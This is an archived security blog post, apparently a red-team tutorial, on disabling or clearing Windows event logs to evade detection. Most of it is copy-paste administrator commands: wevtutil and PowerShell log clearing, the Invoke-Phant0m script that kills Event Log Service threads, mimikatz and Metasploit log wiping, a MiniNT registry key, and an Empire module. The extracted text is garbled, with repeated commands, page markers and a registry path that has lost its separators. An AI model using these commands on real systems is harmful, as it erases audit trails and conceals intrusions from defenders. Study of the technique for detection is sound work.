Defense Evasion: Windows Event Logging (T1562.002) By raj Published: 2021-04-22 · Archived: 2026-04-05 22:06:27 UTC In this post, we explore Windows Event Logging defense evasion techniques used by attackers to avoid detection. By disabling, bypassing, or tampering with event logs using tools and scripts, threat actors can cover their tracks and stay hidden from security teams. Understanding these techniques is crucial for defenders to strengthen monitoring and response capabilities. Defense Evasion is a cyber kill chain attack strategy that includes strategies used by attackers to prevent detection during their violation. MITRE TACTIC: Defenses Evasion (TA0005) MITRE TECHNIQUE: Impair Defence (T1562) SUBTITLE: Disable Windows Event Logging (T1562.002) Table of Contents Clear Event log using Wevtutil Command Clear Event log using Powershell Phantom Mimikatz MiniNT registry key Powershell Empire Metasploit To restrict the amount of data that can be used for detection and audits, an attacker can disable Windows event logging. Login attempts, process development, other user and device behaviour are all recorded in Windows event logs. Intelligence software and analysts use this information to identify the artifacts. Clear Event log using Wevtutil Command It’s a system tool that lets you look up details on event logs and publishers. You can also use this command for installing and uninstalling event manifests, exporting, archiving, and clearing logs. https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ Page 1 of 10 Execute the following command with administrator right: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter wevtutil cl security wevtutil cl security wevtutil cl security 😊 All logs are clear now, but one log will be generated with event ID 1102 for clearing logs https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ Page 2 of 10 Clear Event log using Powershell Another method is to use PowerShell for clearing logs, as you can observe that the machine has a system & security log. https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ Page 3 of 10 Run Powershell as administrator and execute the following command: https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ Page 4 of 10 Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter Clear-Eventlog -LogName Security Clear-Eventlog -LogName System Clear-Eventlog -LogName Security Clear-Eventlog -LogName System Clear-Eventlog -LogName Security Clear-Eventlog -LogName System The above command will clear all logs from inside System & security. Phantom This script walks thread stacks of the Event Log Service process (specific svchost.exe) and identifies Event Log Threads to kill Event Log Service Threads. So, the system will not be able to collect logs and at the same time, the Event Log Service will appear to be running. Download it from here Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter powershell -ep bypass Import-Module .Invoke-Phant0m.ps1 Invoke-Phantom powershell -ep bypass Import-Module .Invoke-Phant0m.ps1 Invoke-Phantom powershell -ep bypass Import-Module .Invoke-Phant0m.ps1 https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ Page 5 of 10 Invoke-Phantom Mimikatz How can we forget the mimikatz when it comes to the red teaming approach? Mimikatz is the most effective method, allowing you to not only steal the credential but also clear the log from within the event viewer. Run mimikatz as administrator and execute the following command: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter privilege::debug event:: event::clear privilege::debug event:: event::clear https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ Page 6 of 10 privilege::debug event:: event::clear MiniNT registry key You can play with the registry, create a new registry key as mention below, and reboot the machine to reload the hive. Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlMiniNt" reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlMiniNt" reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlMiniNt" https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ Page 7 of 10 This key disables the event viewer and thus restricts it from generating the logs. PowerShell Empire The PowerShell Empire can also be used to clear logs, classify Event Log threads, and destroy Event Log Service threads. Use the following command to execute the module for respected agents: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter usemodule management/phant0m execute https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ Page 8 of 10 usemodule management/phant0m execute usemodule management/phant0m execute Metasploit Last but not least, we have the Metasploit framework to clean applications, security & system logs from within the event viewer. In the meterperter session, you can execute the following command. Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter clearev clearev clearev Disabling Windows Event Logging is a common defense evasion technique used by attackers. Understanding how this tactic works is crucial for defenders to detect and mitigate such stealthy attacks. https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ Page 9 of 10 For more MITRE ATT&CK refer this: Link Reference: https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here Post navigation Source: https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ Page 10 of 10